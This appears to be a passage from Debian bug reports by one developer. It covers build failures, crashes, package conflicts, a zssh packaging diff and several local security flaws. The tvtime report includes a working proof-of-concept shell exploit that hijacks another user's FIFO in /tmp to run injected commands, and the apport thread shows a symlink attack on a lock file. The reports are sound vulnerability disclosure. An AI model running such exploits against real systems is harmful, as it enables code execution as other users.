* Santiago Vila , 2019-11-21, 13:55: you seem to be the upstream author, Indeed. would you consider adopting it? No. Sorry! -- Jakub Wilk
Bug#797077: didjvu: FTBFS: XMP tests fail
* Santiago Vila , 2019-10-27, 17:45: https://people.debian.org/~sanvila/build-logs/didjvu/ [...] Please advise if it's ok to repoen this bug or a new one should be filed instead. It's an entirely different bug; I've filed #943695. -- Jakub Wilk
Bug#943695: didjvu: FTBFS: ERROR: tests.test_timestamp.test_timezones
Source: didjvu
Version: 0.8.2-2
Severity: serious
Justification: fails to build from source
didjvu FTBFS in a minimal chroot:
| ==
| ERROR: tests.test_timestamp.test_timezones
| --
| Traceback (most recent call last):
| File "/usr/lib/python2.7/dist-packages/nose/case.py", line 197, in runTest
| self.test(*self.arg)
| File "/build/didjvu-w3wqV9/didjvu-0.8.2/tests/test_timestamp.py", line 51,
in test_timezones
| t(1261171514, 'Europe/Warsaw', '2009-12-18T22:25:14+01:00')
| File "/build/didjvu-w3wqV9/didjvu-0.8.2/tests/tools.py", line 212, in
wrapper
| raise IsolatedError('\n\n' + msg)
| IsolatedError:
|
| Traceback (most recent call last):
| File "/build/didjvu-w3wqV9/didjvu-0.8.2/tests/tools.py", line 189, in
wrapper
| f(*args, **kwargs)
| File "/build/didjvu-w3wqV9/didjvu-0.8.2/tests/test_timestamp.py", line 44,
in t
| assert_equal(str(result), expected)
| AssertionError: '2009-12-18T21:25:14Z' != '2009-12-18T22:25:14+01:00'
|
| --
The test in question needs the time zone database to work correctly, but
it was not available in the build environment.
Please add "tzdata" to Build-Depends to fix this.
--
Jakub Wilk
Bug#941407: tmperamental makes ls(1) segfault
Package: tmperamental Version: 1.1 Severity: grave tmperamental makes ls(1) crash: $ tmperamental ls Segmentation fault Backtrace: #0 0x in ?? () #1 0xf7f2850e in selinuxfs_exists_internal () at init.c:64 #2 0xf7f1fee0 in init_selinuxmnt () at init.c:99 #3 init_lib () at init.c:154 #4 0xf7f7f0ec in call_init (l=, argc=argc@entry=1, argv=argv@entry=0xff923a34, env=0xff923a3c) at dl-init.c:72 #5 0xf7f7f1f2 in call_init (env=0xff923a3c, argv=0xff923a34, argc=1, l=) at dl-init.c:30 #6 _dl_init (main_map=, argc=1, argv=0xff923a34, env=0xff923a3c) at dl-init.c:119 #7 0xf7f700fa in _dl_start_user () from /lib/ld-linux.so.2 AFAICS, libselinux has a constructor which uses fopen(), and that constructor runs earlier than tmperamental's one, leading to null pointer dereference. -- System Information: Architecture: i386 Versions of packages tmperamental depends on: ii libc6 2.29-2 -- Jakub Wilk
Bug#935800: rss2email: AttributeError: module 'html2text' has no attribute 'unescape'
Package: rss2email Version: 1:3.9-4.1 Severity: grave rss2email no longer works: $ r2e run Traceback (most recent call last): File "/usr/bin/r2e", line 5, in rss2email.main.run() File "/usr/lib/python3/dist-packages/rss2email/main.py", line 163, in run args.func(feeds=feeds, args=args) File "/usr/lib/python3/dist-packages/rss2email/command.py", line 64, in run feed.run(send=args.send) File "/usr/lib/python3/dist-packages/rss2email/feed.py", line 842, in run for (guid, id_, sender, message) in self._process(parsed): File "/usr/lib/python3/dist-packages/rss2email/feed.py", line 357, in _process processed = self._process_entry(parsed=parsed, entry=entry) File "/usr/lib/python3/dist-packages/rss2email/feed.py", line 462, in _process_entry sender = self._get_entry_email(parsed=parsed, entry=entry) File "/usr/lib/python3/dist-packages/rss2email/feed.py", line 652, in _get_entry_email name = self._get_entry_name(parsed=parsed, entry=entry) File "/usr/lib/python3/dist-packages/rss2email/feed.py", line 602, in _get_entry_name return _html2text.unescape(name) AttributeError: module 'html2text' has no attribute 'unescape' -- System Information: Architecture: i386 Versions of packages rss2email depends on: ii python3-feedparser 5.2.1-1 ii python3-html2text 2019.8.11-1 ii python3 3.7.3-1 Versions of packages rss2email recommends: ii python3-bs4 4.8.0-1 Versions of packages rss2email suggests: ii esmtp 1.2-17 -- Jakub Wilk
Bug#769366: zssh won't start: "out of pty's"
* Ben Wong , 2017-12-22, 17:03:
Wait, that bug again? I fixed that a long time ago.
Indeed, you did. However, the critical part of the fix was regenerating
the configure script (and to lesser extent config.h.in) from source.
This was done at build time by adding:
DEB_AUTO_UPDATE_AUTOHEADER := 2.61
DEB_AUTO_UPDATE_AUTOCONF := 2.61
to debian/rules.
It turns out these two lines were removed without explanation in the
1.5c.debian.1-3.2 NMU.
(This is not the only problem with this upload. It failed to follow the
NMU guidelines (DevRef §5.11.1) in multiple ways:
* It changes source package format and patch system, whereas "fixing
cosmetic issues or changing the packaging style [...] in NMUs is
discouraged."
* The upload was without appropriate delay.
* NMU diff was not posted to the BTS.
Another undocumented change in the NMU is removal of the
fake_readline/Makefile hunk from the 01_pre_cdbs.diff patch. No idea
what's the consequence of that.)
It would be probably too invasive to add DEB_AUTO_UPDATE_* back in a
stable upload (especially now that unstable has an entirely different
fix for the bug), so I'd like to propose to regenerate autoconf stuff
once and stick the diff into 04_GNU_openpty.patch. See the attached
debdiff.
For the avoidance of doubt, I don't intend to do the actual upload. It
is YunQiang's job to fix the regression.
As a side note, some people noticed that just rebuilding the package
from source fixes the problem for them. This is because when openpty()
is not available (or, in our case, when it's not detected correctly),
the package falls back to getpt(), and that works. However, the
configure test for UNIX 98 pseudoterminal naming is broken:
if test -c /dev/ptmx && test -c /dev/pts/0
But /dev/pts/0 doesn't exist when nothing is using ptys at the moment;
indeed, evidently it didn't exist when this package was built on
buildds.
So regenerating autotools files is strictly required after all.
No-change rebuilds wouldn't be sufficient.
--
Jakub Wilk
diff -Nru zssh-1.5c.debian.1/debian/changelog zssh-1.5c.debian.1/debian/changelog
--- zssh-1.5c.debian.1/debian/changelog 2014-07-21 10:27:39.0 +0200
+++ zssh-1.5c.debian.1/debian/changelog 2019-04-11 21:31:11.0 +0200
@@ -1,3 +1,9 @@
+zssh (1.5c.debian.1-3.2+deb9u1) stretch; urgency=low
+
+ * Regenerate autoconf files from source (closes: #769366).
+
+ -- Jakub Wilk Thu, 11 Apr 2019 21:31:11 +0200
+
zssh (1.5c.debian.1-3.2) unstable; urgency=medium
* Non-maintainer upload.
diff -Nru zssh-1.5c.debian.1/debian/patches/04_GNU_openpty.patch zssh-1.5c.debian.1/debian/patches/04_GNU_openpty.patch
--- zssh-1.5c.debian.1/debian/patches/04_GNU_openpty.patch 2014-07-21 10:27:39.0 +0200
+++ zssh-1.5c.debian.1/debian/patches/04_GNU_openpty.patch 2019-04-11 21:31:11.0 +0200
@@ -40,3 +40,147 @@
void getmaster()
{
#ifdef DEBUG
+--- zssh-1.5c.debian.1.orig/configure
zssh-1.5c.debian.1/configure
+@@ -1293,7 +1293,7 @@
+ fi
+
+ for ac_hdr in fcntl.h paths.h sys/ioctl.h sys/time.h termios.h unistd.h \
+- err.h sys/cdefs.h sys/param.h util.h stropts.h
++ err.h sys/cdefs.h sys/param.h util.h stropts.h pty.h
+ do
+ ac_safe=`echo "$ac_hdr" | sed 'y%./+-%__p_%'`
+ echo $ac_n "checking for $ac_hdr""... $ac_c" 1>&6
+@@ -1827,7 +1827,7 @@
+
+
+
+-for ac_func in _getpty getpseudotty openpty grantpt unlockpt
++for ac_func in _getpty getpseudotty grantpt unlockpt
+ do
+ echo $ac_n "checking for $ac_func""... $ac_c" 1>&6
+ echo "configure:1834: checking for $ac_func" >&5
+@@ -1882,8 +1882,110 @@
+ fi
+ done
+
++for ac_func in openpty
++do
++echo $ac_n "checking for $ac_func""... $ac_c" 1>&6
++echo "configure:1889: checking for $ac_func" >&5
++if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then
++ echo $ac_n "(cached) $ac_c" 1>&6
++else
++ cat > conftest.$ac_ext <
++/* Override any gcc2 internal prototype to avoid an error. */
++/* We use char because int might match the return type of a gcc2
++builtin and then its argument prototype would still apply. */
++char $ac_func();
++
++int main() {
++
++/* The GNU C library defines this for functions which it implements
++to always fail with ENOSYS. Some functions are actually named
++something starting with __ and the normal name is an alias. */
++#if defined (__stub_$ac_func) || defined (__stub___$ac_func)
++choke me
++#else
++$ac_func();
++#endif
++
++; return 0; }
++EOF
++if { (eval echo configure:1917: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then
++ rm -rf conftest*
++ eval "ac_cv_func_$ac_func=yes"
++else
++ echo "configure: failed program was:" >&5
++ cat conftest.$ac_ext >&5
++ rm -rf conftest*
+
Bug#926720: node-miller-rabin: FTBFS randomly (uses a non-prime to test the test)
* Santiago Vila , 2019-04-09, 15:32: AFAIK, this being a primality test, I assume the outcome is either "not prime" or "maybe prime", so the only way to test the test is by giving a known prime and expect "maybe prime" as output. So: Why is the test calling mr.test with 221, which is not prime? (221 = 13 x 17) Correctly implemented Miller-Rabin test should have false positives only with negligible probability. And why this fails randomly? Does the test perform random calculations internally and it's therefore not deterministic? Yes. Even in such case I don't see how a non-prime like 221 may help to catch obvious errors in a test suite for a primality test. It's just proven to be useful. Please restore the test and fix the code instead. NB, it's been already reported upstream that the number of iterations this implementation chooses in not adequate: https://github.com/indutny/miller-rabin/issues/9 -- Jakub Wilk
Bug#926313: leptonica-progs: trying to overwrite '/usr/bin/imagetops', which is also in package netpbm
Package: leptonica-progs Version: 1.78.0-1 Severity: serious leptonica-progs fails to upgrade here: Unpacking leptonica-progs (1.78.0-1) over (1.76.0-1) ... dpkg: error processing archive /tmp/apt-dpkg-install-HhGtJC/7-leptonica-progs_1.78.0-1_i386.deb (--unpack): trying to overwrite '/usr/bin/imagetops', which is also in package netpbm 2:10.0-15.3+b2 Errors were encountered while processing: /tmp/apt-dpkg-install-HhGtJC/7-leptonica-progs_1.78.0-1_i386.deb E: Sub-process /usr/bin/dpkg returned an error code (1) -- Jakub Wilk
Bug#924076: tvtime: insecure use of /tmp
Hi Helge! * Helge Kreutzmann , 2019-03-23, 20:48: +/* Create a secure private temporary directory */ +fifosdir = mkdtemp(FIFODIR "tvtimeXX"); The mkdtemp(2) man page says: "Since it will be modified, template must not be a string constant, but should be declared as a character array." This is the reason it segfaults. Also, slash is missing between FIFODIR and "tvtime". You would need something like this: char *fifosdir; char fifosdir_buf[] = FIFODIR "/tvtimeXX"; fifosdir = mkdtemp(fifosdir_buf); So (with the addition of error handling) this would fix insecure use of /tmp; but it also breaks communication between tvtime-command(1) and tvtime(1). They need to use the same fifo to communicate, but mkdtemp() ensures that this is never the case: $ tvtime-command QUIT Reading configuration from /etc/tvtime/tvtime.xml Reading configuration from /home/jwilk/.tvtime/tvtime.xml tvtime-command: Cannot open /tmp/tvtimeHH48wA/.TV-jwilk/tvtimefifo-borsuk: No such file or directory It would be best to avoid using /tmp for fifos. tvtime already falls back to $HOME when /tmp couldn't be used (grep for "put the fifo in $HOME" in src/utils.c), to this should be a matter of disabling the /tmp codepath. -- Jakub Wilk
Bug#924693: apport: /var/crash/.lock is world-writable
* Ritesh Raj Sarraf , 2019-03-18, 20:06: Do you use apport ? No. Or have interest for it in Debian ? Also no. -- Jakub Wilk
Bug#924692: apport: /var/crash/.lock created insecurely
* Ritesh Raj Sarraf , 2019-03-18, 20:20: Apport tries to create /var/crash/.lock if doesn't exist already. But /var/crash/ is world-writable, so a malicious local user could do: ln -sf /nonexistent /var/crash/.lock to prevent Apport from creating the lock file. Yes. /var/crash/ is world writable and has the sticky bit set. It is needed so that normal (unprivileged) user processes also write down their crash reports without seeking root privileges. Yes. But that still does not fix the security concern raised in this bug report. What would be the optimal fix for this ? There might be good reasons for /var/crash to be world-writable (although it's certainly asking for troubles), but I can't see any reason to keep the lock file in this directory. Move the lock somewhere else (say /var/lib/apport/lock), make it owned by root:root and with permissions 0600. This should work because the lock is acquired before dropping privileges. -- Jakub Wilk
Bug#924397: corekeeper: insecure use of world-writable /var/crash
* Paul Wise , 2019-03-15, 08:59: As a data point, apport creates /var/crash as world-writable in postinst: Does apport use a core dump handler? Yes. If so it shouldn't need a world writable directory since the core dump handler runs as root. Apparmor saves dumps directly in /var/crash (bad idea...), so the sticky bit is needed so that the user can delete their own core dumps. I've filed #924692 and #924693 so far, but there's probably more. -- Jakub Wilk
Bug#924397: corekeeper: insecure use of world-writable /var/crash
As a data point, apport creates /var/crash as world-writable in postinst: if [ "$1" = configure ]; then # directory is required for package failures even if apport is disabled mkdir -p -m 1777 /var/crash fi And it chmods it in the init script: chmod 1777 /var/crash OTOH, this directory is only accessible to trusted users on stock FreeBSD: drwxr-x--- 2 root wheel 2 Jul 2 2018 /var/crash/ So I imagine there's software out there that assumes this directory has safe permissions. What a mess... -- Jakub Wilk
Bug#924397: corekeeper: insecure use of world-writable /var/crash
+ if [ ! -e $(script) ; then chmod 1777 debian/corekeeper/var/crash ; fi This never does anything, because closing square bracket is missing: /bin/sh: 1: [: missing ] Also, it looks like dpkg doesn't update directory permissions on upgrade. Ugh. :-( -- Jakub Wilk
Bug#924397: corekeeper: insecure use of world-writable /var/crash
Package: corekeeper Version: 1.6 Severity: critical Tags: security (I reported this privately in 2016...) /usr/lib/corekeeper/dump does this: mkdir -p "/var/crash/$owner" This is pretty bad. /var/crash is word-writable, so anybody could have created a subdirectory there. "mkdir -p" will succeed if /var/crash/$owner/ exists, even when it's owned by another user. An attacker could exploit this to read other users' core files. Additionally, on systems that have protected_symlinks or protected_symlinks disabled, this could be exploited to take ownership of arbitrary files, or to overwrite arbitrary files. I don't understand why /var/crash is world-writable; but if it has to be for some reason, then the crash handler must verify that /var/crash/$owner is in fact a directory owned by the right user. Verifying that the directory has the right permissions (700) is probably also a good idea. -- Jakub Wilk
Bug#924076: tvtime: insecure use of /tmp
Package: tvtime Version: 1.0.11-4 Severity: grave Tags: security tvtime uses /tmp/.TV-/ as a temporary directory, even when it belongs to another (potentially malicious) user. Local attacker can exploit this bug to execute arbitrary code in the context of a tvtime user. I've attached a proof-of-concept exploit. -- Jakub Wilk #!/bin/sh set -e -u if ! command -v xeyes > /dev/null then printf 'xeyes(1) not found. Please install x11-apps.\n' >&2 exit 1 fi cd /tmp basedir=$(mktemp -d tvtime-exploit.XX) chmod 755 "$basedir" mkfifo -m 644 "$basedir/cmd" mkfifo -m 666 "$basedir/ratelim" hostname=$(hostname) users=$(getent passwd | cut -d: -f1) for user in $users do userdir=".TV-$user" rm -rf "$userdir" || true # maybe stale dir from the previous exploit run? if ! mkdir -m 755 "$userdir" then printf 'Failed to mount the exploit against %s; Maybe try again after reboot?\n' "$user" continue fi ln "$basedir/cmd" "$userdir/tvtimefifo-$hostname" done while true do printf 'Waiting for the victim to run tvtime...' "$0" >&2 printf 'RUN_COMMAND xeyes && echo x > /tmp/%s; true\n' "$basedir/ratelim" > "$basedir/cmd" printf '\n' >&2 read x < "$basedir/ratelim" done
Bug#922455: pinfo: malloc(): invalid size (unsorted)
Package: pinfo Version: 0.6.12-2 Severity: grave pinfo doesn't start: $ pinfo Przemek's Info Viewer v0.6.12 malloc(): invalid size (unsorted) Aborted Valgrind suggests some memory corruption happened: Syscall param stat64(file_name) points to unaddressable byte(s) at 0x49FE605: __xstat64@@GLIBC_2.2 (xstat64.c:35) by 0x10DCD3: stat (stat.h:455) by 0x10DCD3: initpaths (filehandling_functions.c:1042) by 0x10AAE8: main (pinfo.c:248) Address 0x0 is not stack'd, malloc'd or (recently) free'd Invalid write of size 4 at 0x10DE6A: initpaths (filehandling_functions.c:1051) by 0x10AAE8: main (pinfo.c:248) Address 0x4b008a8 is 0 bytes after a block of size 96 alloc'd at 0x4836A16: calloc (in /usr/lib/i386-linux-gnu/valgrind/vgpreload_memcheck-x86-linux.so) by 0x118C69: xmalloc (utils.c:110) by 0x10DC7F: initpaths (filehandling_functions.c:1036) by 0x10AAE8: main (pinfo.c:248) Invalid write of size 4 at 0x10DE70: initpaths (filehandling_functions.c:1051) by 0x10AAE8: main (pinfo.c:248) Address 0x4b008ac is 4 bytes after a block of size 96 alloc'd at 0x4836A16: calloc (in /usr/lib/i386-linux-gnu/valgrind/vgpreload_memcheck-x86-linux.so) by 0x118C69: xmalloc (utils.c:110) by 0x10DC7F: initpaths (filehandling_functions.c:1036) by 0x10AAE8: main (pinfo.c:248) ... -- System Information: Architecture: i386 Versions of packages pinfo depends on: ii libc6 2.28-7 ii libncursesw6 6.1+20181013-2 ii libreadline7 7.0-5 ii libtinfo6 6.1+20181013-2 ii install-info 6.5.0.dfsg.1-4+b1 -- Jakub Wilk
Bug#922297: rxvt-unicode: *blink* *blink* *blink*
* Ryan Kavanagh , 2019-02-14, 09:01: The terminal screen blinks all the time. What resources do you have set for URxvt? (See output of "appres URxvt".) What perl extensions are you using? I can reproduce the issue without any custom settings or extensions, that is: $ appres URxvt *customization: -color (The "customization" line comes from /etc/X11/Xresources/x11-common.) The effect is quite subtle, so I can imagine some people might not notice it. -- Jakub Wilk
Bug#922297: rxvt-unicode: *blink* *blink* *blink*
Package: rxvt-unicode Version: 9.22-5 Severity: grave Justification: makes my head hurt The terminal screen blinks all the time. -- System Information: Architecture: i386 Versions of packages rxvt-unicode depends on: ii libc6 2.28-7 ii libfontconfig12.13.1-2 ii libfreetype6 2.9.1-3 ii libgcc1 1:8.2.0-20 ii libgdk-pixbuf2.0-02.38.0+dfsg-7 ii libglib2.0-0 2.58.3-1 ii libperl5.28 5.28.1-4 ii libstartup-notification0 0.12-6 ii libx11-6 2:1.6.7-1 ii libxft2 2.3.2-2 ii libxrender1 1:0.9.10-1 ii base-passwd 3.5.46 ii ncurses-base 6.1+20181013-2 ii ncurses-term 6.1+20181013-2 -- Jakub Wilk
Bug#920269: [vinc...@vinc17.net: Bug#920269: groff: gropdf can execute arbitrary commands]
* Colin Watson , 2019-01-23, 13:56: Perl >= 5.20 has the safer <<>> operator, It was actually added only in Perl 5.22. perl5220delta man page says: New double‐diamond operator "<<>>" is like "<>" but uses three‐argument "open" to open each file in @ARGV. This means that each element of @ARGV will be treated as an actual file name, and "|foo" won’t be treated as a pipe open. -- Jakub Wilk
Bug#919697: arcanist: file conflict with arc
Package: arcanist Severity: serious Justification: Policy §10.1 This package ships /usr/bin/arc, which is also shipped by unrelated package arc. Policy says: “Two different packages must not install programs with different functionality but with the same filenames.” -- Jakub Wilk
Bug#919473: zapping: Settings schema 'net.sf.Zapping.plugins.teletext' does not contain a key named 'method'
Package: zapping Version: 0.10~cvs6-15 Severity: grave zapping doesn't start: $ zapping (zapping:3191): dbind-WARNING **: 13:01:17.865: Error retrieving accessibility bus address: org.freedesktop.DBus.Error.ServiceUnknown: The name org.a11y.Bus was not provided by any .service files (zapping:3191): GLib-GIO-ERROR **: 13:01:18.527: Settings schema 'net.sf.Zapping.plugins.teletext' does not contain a key named 'method' Trace/breakpoint trap -- System Information: Architecture: i386 Versions of packages zapping depends on: ii dconf-gsettings-backend [gsettings-backend] 0.30.1-2 ii libc62.28-5 ii libcairo21.16.0-2 ii libgdk-pixbuf2.0-0 2.38.0+dfsg-7 ii libglib2.0-0 2.58.2-3 ii libgtk-3-0 3.24.3-1 ii libjpeg62-turbo 1:1.5.2-2+b1 ii liblirc-client0 0.10.1-5 ii libpango-1.0-0 1.42.4-6 ii libpangocairo-1.0-0 1.42.4-6 ii libpng16-16 1.6.36-3 ii libpython2.7 2.7.15-5 ii libx11-6 2:1.6.7-1 ii libxext6 2:1.3.3-1+b2 ii libxinerama1 2:1.1.4-1 ii libxml2 2.9.4+dfsg1-7+b3 ii libxmu6 2:1.1.2-2 ii libxv1 2:1.0.11-1 ii libxxf86dga1 2:1.1.4-1+b3 ii libxxf86vm1 1:1.1.4-1+b2 ii libzvbi0 0.2.35-15 Versions of packages zapping recommends: pn gconf2 -- Jakub Wilk
Bug#909750: applications tries to write to /usr/* directories via libfontconfig1
* Laurent Bigonville , 2018-11-11, 11:18: Do you have any .uuid files in these directories? IIRC, I didn't have any back then. Can you try to run "fc-cache -s -f -v" (as root) and see if it helps. I think I upgraded some font package, which triggered fontconfig, which ran the aforementioned command. Yes, it did help. What file system do you use for /usr/share/fonts/? ext4 The only occurrence I'm seeing on my system is: openat(AT_FDCWD, "/usr/lib/firefox/fonts/.uuid.TMP-EWjEq0", O_RDWR|O_CREAT|O_EXCL|O_CLOEXEC, 0600) = -1 EACCES (Permission denied) Now it's the only occurrence for me, too. -- Jakub Wilk
Bug#909750: applications tries to write to /usr/* directories via libfontconfig1
Control: found -1 2.13.1-2 It's still reproducible for me: $ strace -o '| grep -w EACCES' /usr/lib/firefox-esr/firefox-bin ... openat(AT_FDCWD, "/usr/share/fonts/truetype/mononoki/.uuid.TMP-lrzetE", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE|O_CLOEXEC, 0600) = -1 EACCES (Permission denied) openat(AT_FDCWD, "/usr/share/fonts/truetype/wine/.uuid.TMP-p6l2oU", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE|O_CLOEXEC, 0600) = -1 EACCES (Permission denied) openat(AT_FDCWD, "/usr/share/fonts/woff/mononoki/.uuid.TMP-S9ygla", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE|O_CLOEXEC, 0600) = -1 EACCES (Permission denied) openat(AT_FDCWD, "/usr/share/fonts/X11/encodings/large/.uuid.TMP-VcWBhq", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE|O_CLOEXEC, 0600) = -1 EACCES (Permission denied) openat(AT_FDCWD, "/usr/lib/firefox-esr/fonts/.uuid.TMP-uG7neG", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE|O_CLOEXEC, 0600) = -1 EACCES (Permission denied) ... -- Jakub Wilk
Bug#907308: latrace: every program "killed by signal 11"
Package: latrace Version: 0.5.11-1+b2 Severity: grave latrace seems to be completely broken: $ latrace true true finished - killed by signal 11 -- System Information: Architecture: i386 Versions of packages latrace depends on: ii libc6 2.27-5 -- Jakub Wilk
Bug#900882: susv4: fails to install: ERROR 404: Not Found.
Package: susv4 Version: 7.20161013 Severity: grave # apt-get install -q susv4 Reading package lists... Building dependency tree... Reading state information... The following NEW packages will be installed: susv4 (7.20161013) 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 0 B/3278 B of archives. After this operation, 15.4 kB of additional disk space will be used. debconf: delaying package configuration, since apt-utils is not installed Selecting previously unselected package susv4. (Reading database ... 11900 files and directories currently installed.) Preparing to unpack .../susv4_7.20161013_all.deb ... Unpacking susv4 (7.20161013) ... Setting up susv4 (7.20161013) ... Fetching file... --2018-06-06 10:24:50-- http://pubs.opengroup.org/onlinepubs/9699919799/download/susv4tc2.tar.bz2 Resolving pubs.opengroup.org (pubs.opengroup.org)... 69.80.200.148 Connecting to pubs.opengroup.org (pubs.opengroup.org)|69.80.200.148|:80... connected. HTTP request sent, awaiting response... 404 Not Found 2018-06-06 10:24:52 ERROR 404: Not Found. dpkg: error processing package susv4 (--configure): installed susv4 package post-installation script subprocess returned error exit status 8 Errors were encountered while processing: susv4 E: Sub-process /usr/bin/dpkg returned an error code (1) -- Jakub Wilk
Bug#898327: cppcheck: *** stack smashing detected ***: terminated
I tested this with packages from unstable from the moment the package was built: deb http://snapshot.debian.org/archive/debian/20180412T222117Z/ unstable main cppcheck worked flawlessly in this environment. It only started crashing when I upgraded libtinyxml2-6 (6.0.0+dfsg-1 -> 6.2.0+dfsg-1). This made me think it's an ABI breakage in libtinyxml2. And indeed, tinyxml 6.2.0 added a new member to the XMLDocument class: https://github.com/leethomason/tinyxml2/commit/d946ddadc27cef72116237148f88593da57c894a#diff-f0c986b0c387a2c34d4d6232c8d8c86b But SONAME wasn't bumped. :( -- Jakub Wilk
Bug#898327: cppcheck: *** stack smashing detected ***: terminated
Package: cppcheck Version: 1.83-1 Severity: grave cppcheck seems to crash on every file: $ cppcheck /dev/null *** stack smashing detected ***: terminated Aborted Backtrace: #0 0xf7fd5059 in __kernel_vsyscall () #1 0xf7adb5b2 in __libc_signal_restore_set (set=0xc2fc) at ../sysdeps/unix/sysv/linux/nptl-signals.h:80 #2 __GI_raise (sig=6) at ../sysdeps/unix/sysv/linux/raise.c:48 #3 0xf7adc9d1 in __GI_abort () at abort.c:79 #4 0xf7b1d273 in __libc_message (action=do_abort, fmt=) at ../sysdeps/posix/libc_fatal.c:181 #5 0xf7bb606a in __GI___fortify_fail_abort (need_backtrace=false, msg=0xf7c2c0b3 "stack smashing detected") at fortify_fail.c:33 #6 0xf7bb601b in __stack_chk_fail () at stack_chk_fail.c:29 #7 0x56799244 in __stack_chk_fail_local () #8 0x566b5303 in Library::load (this=0xcf98, exename=0xd799 "/usr/bin/cppcheck", path=0x567bab8f "std.cfg") at lib/library.cpp:116 #9 0x56777bf7 in CppCheckExecutor::tryLoadLibrary (destination=..., basepath=0xd799 "/usr/bin/cppcheck", filename=0x567bab8f "std.cfg") at cli/cppcheckexecutor.cpp:1062 #10 0x5677a160 in CppCheckExecutor::check_internal (this=0xd384, cppcheck=..., argv=0xd5a4) at cli/cppcheckexecutor.cpp:814 #11 0x5677b9f4 in CppCheckExecutor::check (this=0xd384, argc=2, argv=0xd5a4) at cli/cppcheckexecutor.cpp:199 #12 0x56597f13 in main (argc=2, argv=0xd5a4) at cli/main.cpp:136 -- System Information: Architecture: i386 Versions of packages cppcheck depends on: ii libc6 2.27-3 ii libgcc1 1:8.1.0-1 ii libpcre3 2:8.39-9 ii libstdc++68.1.0-1 ii libtinyxml2-6 6.2.0+dfsg-1 ii python3 3.6.5-3 ii python3-pygments 2.2.0+dfsg-1 -- Jakub Wilk
Bug#897251: pdf2djvu: FAIL: test-1px-font.test.test
AssertionError: 'Unable to revert mtime: /usr/local/share/fonts\n' != '' The test fails because there was an unexpected warning on stderr. Apparently this one was generated by fontconfig: https://cgit.freedesktop.org/fontconfig/tree/src/fccache.c?h=2.13.0#n127 No idea why it was emitted, though... I can't reproduce this failure. I tried building pdf2djvu in an up-to-date clean amd64 chroot, and the build succeeded. Is this reproducible for you? Does it happen every time? Does /usr/local/share/fonts exist in your build environment? (It doesn't in my chroot, even after installing all the build-dependencies.) -- Jakub Wilk
Bug#892109: pdf2djvu FTBFS with libpoppler-dev 0.62.0-2
* Adrian Bunk <b...@debian.org>, 2018-03-05, 18:50: pdf-unicode.cc:29:10: fatal error: UTF8.h: No such file or directory This was fixed upstream in 0.9.8: https://github.com/jwilk/pdf2djvu/commit/e263c43bbd552a771f74f0f93ce9cca8b1aa8702 -- Jakub Wilk
Bug#887752: didjvu: FTBFS and Debci failure with python-pil 5.0.0-1
* Adrian Bunk <b...@debian.org>, 2018-01-19, 18:57:
==
ERROR: tests.test_djvu.test_photo_to_djvu
--
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/nose/case.py", line 197, in runTest
self.test(*self.arg)
File "/build/1st/didjvu-0.8.1/tests/test_djvu.py", line 69, in
test_photo_to_djvu
in_image = in_image.convert('RGB')
File "/usr/lib/python2.7/dist-packages/PIL/Image.py", line 877, in convert
self.load()
File "/usr/lib/python2.7/dist-packages/PIL/TiffImagePlugin.py", line 1039, in
load
return self._load_libtiff()
File "/usr/lib/python2.7/dist-packages/PIL/TiffImagePlugin.py", line 1131, in
_load_libtiff
raise IOError(err)
IOError: -2
This is caused by a bug in Pillow:
https://github.com/python-pillow/Pillow/issues/2926
--
Jakub Wilk
Bug#873394: cython-doc: trying to overwrite '/usr/share/man/man1/cython.1.gz', which is also in package cython 0.26-1
Package: cython Version: 0.26-1 Severity: serious Unpacking cython-doc (0.26-1) over (0.25.2-2) ... dpkg: error processing archive /tmp/apt-dpkg-install-atQ9oy/07-cython-doc_0.26-1_all.deb (--unpack): trying to overwrite '/usr/share/man/man1/cython.1.gz', which is also in package cython 0.26-1 -- Jakub Wilk
Bug#873163: polib FTBFS: FAIL: test_save_as_mofile
* Adrian Bunk <b...@debian.org>, 2017-08-25, 10:02: == FAIL: test_save_as_mofile (__main__.TestPoFile) -- Traceback (most recent call last): File "tests/tests.py", line 567, in test_save_as_mofile self.assertEqual(s1, s2) AssertionError: ... (huge string removed by bug submitter) This is most likely fallout from #792687. msgfmt now removes the POT-Creation-Date header from MO files, but polib does not. As a quick-and-dirty fix, you could remove this header from tests/test_save_as_mofile.po. -- Jakub Wilk
Bug#870873: exiv2: FTBFS: some symbols or patterns disappeared in the symbols file
Source: exiv2 Version: 0.26-1 Severity: serious Justification: fails to build from source exiv2 FTBFS on i386: |dh_makeshlibs -a -O--parallel -O--buildsystem=cmake | dpkg-gensymbols: warning: some new symbols appeared in the symbols file: see diff output below | dpkg-gensymbols: warning: some symbols or patterns disappeared in the symbols file: see diff output below | dpkg-gensymbols: warning: debian/libexiv2-26/DEBIAN/symbols doesn't match completely debian/libexiv2-26.symbols | --- debian/libexiv2-26.symbols (libexiv2-26_0.26-1_i386) | +++ dpkg-gensymbolsVBtVbw 2017-07-17 10:37:38.321705782 + | @@ -135,8 +135,10 @@ | _Z12xdefaultNameB5cxx11@Base 0.26 | _Z13DetectAltTextP8XMP_Node@Base 0.26 | _Z13FindChildNodeP8XMP_NodePKcbPN9__gnu_cxx17__normal_iteratorIPS0_St6vectorIS0_SaIS0_@Base 0.26 | - _Z13ToUTF16NativePKhmPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE@Base 0.26 | - _Z13ToUTF32NativePKhmPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE@Base 0.26 | + _Z13ToUTF16NativePKhjPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE@Base 0.26-1 | +#MISSING: 0.26-1# _Z13ToUTF16NativePKhmPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE@Base 0.26 | + _Z13ToUTF32NativePKhjPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE@Base 0.26-1 | +#MISSING: 0.26-1# _Z13ToUTF32NativePKhmPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE@Base 0.26 [snip - lot's of other 